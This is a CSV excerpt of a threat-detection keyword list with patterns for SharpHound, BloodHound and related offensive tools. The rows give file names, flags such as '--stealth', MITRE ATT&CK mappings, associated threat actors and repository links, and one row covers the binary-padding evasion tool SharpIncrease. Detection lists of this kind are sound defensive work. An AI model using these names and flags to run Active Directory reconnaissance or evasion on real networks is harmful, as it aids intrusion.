"*SharpHound completed {Number} loops!*",".{0,1000}SharpHound\scompleted\s\{Number\}\sloops!.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","59011"
"*SharpHound Enumeration Completed at *",".{0,1000}SharpHound\sEnumeration\sCompleted\sat\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","SharpHound","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","59012"
"*SharpHound Enumeration Completed at *",".{0,1000}SharpHound\sEnumeration\sCompleted\sat\s.{0,1000}","offensive_tool_keyword","sharphound","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","SharpHound","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","59013"
"*SharpHound-*.zip*",".{0,1000}SharpHound\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","59014"
"*sharphound*--stealth*",".{0,1000}sharphound.{0,1000}\-\-stealth.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","59015"
"*sharphound.*",".{0,1000}sharphound\..{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","59016"
"*SharpHound.cna*",".{0,1000}SharpHound\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/C0axx/AggressorScripts","1","1","N/A","N/A","10","10","39","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z","59017"
"*SharpHound.exe*",".{0,1000}SharpHound\.exe.{0,1000}","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","59018"
"*SharpHound.exe*",".{0,1000}SharpHound\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/C0axx/AggressorScripts","1","1","N/A","N/A","10","10","39","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z","59019"
"*SharpHound.exe*",".{0,1000}SharpHound\.exe.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59020"
"*sharphound.exe*",".{0,1000}sharphound\.exe.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","1","N/A","AD Enumeration","9","10","1013","98","2024-10-21T18:58:20Z","2022-10-12T05:54:35Z","59021"
"*SharpHound.exe*",".{0,1000}SharpHound\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59022"
"*SharpHound.exe*",".{0,1000}SharpHound\.exe.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","59023"
"*SharpHound.exe*",".{0,1000}SharpHound\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Black Basta","Framework","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","N/A","","N/A","","","","59024"
"*Sharphound.Program*",".{0,1000}Sharphound\.Program.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","59025"
"*SharpHound.ps1*",".{0,1000}SharpHound\.ps1.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","59026"
"*SharpHound.ps1*",".{0,1000}SharpHound\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/C0axx/AggressorScripts","1","1","N/A","N/A","10","10","39","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z","59027"
"*SharpHound.ps1*",".{0,1000}SharpHound\.ps1.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59028"
"*SharpHound.ps1*",".{0,1000}SharpHound\.ps1.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","59029"
"*sharphound.ps1*",".{0,1000}sharphound\.ps1.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","59030"
"*SharpHound.ps1*",".{0,1000}SharpHound\.ps1.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","59031"
"*SharpHound.ps1*",".{0,1000}SharpHound\.ps1.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Black Basta","Framework","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","N/A","","N/A","","","","59032"
"*Sharphound.Runtime*",".{0,1000}Sharphound\.Runtime.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#content","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","59033"
"*SharpHound/releases/download/*",".{0,1000}SharpHound\/releases\/download\/.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","59034"
"*SharpHound2*",".{0,1000}SharpHound2.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","59035"
"*Sharphound2.*",".{0,1000}Sharphound2\..{0,1000}","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/C0axx/AggressorScripts","1","1","N/A","N/A","10","10","39","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z","59036"
"*SharpHound3*",".{0,1000}SharpHound3.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","59037"
"*Sharphound-Aggressor*",".{0,1000}Sharphound\-Aggressor.{0,1000}","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/C0axx/AggressorScripts","1","1","N/A","N/A","10","10","39","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z","59038"
"*SharpHoundCommon.*",".{0,1000}SharpHoundCommon\..{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","59039"
"*SharpHoundCommonLib*",".{0,1000}SharpHoundCommonLib.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","59040"
"*SharpHoundCommonLib.dll*",".{0,1000}SharpHoundCommonLib\.dll.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","59041"
"*SharpHoundCommonLib.LDAPQueries*",".{0,1000}SharpHoundCommonLib\.LDAPQueries.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","SharpHound","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","59042"
"*SharpHoundCommonLib.LDAPQueries*",".{0,1000}SharpHoundCommonLib\.LDAPQueries.{0,1000}","offensive_tool_keyword","sharphound","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","SharpHound","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","59043"
"*SharpIncrease.exe -D *",".{0,1000}SharpIncrease\.exe\s\-D\s.{0,1000}","offensive_tool_keyword","SharpIncrease","binary padding to add junk data and change the on-disk representation of a file","T1480 - T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/mertdas/SharpIncrease","1","0","N/A","N/A","6","2","148","30","2024-06-28T21:36:46Z","2023-03-14T23:35:32Z","59044"
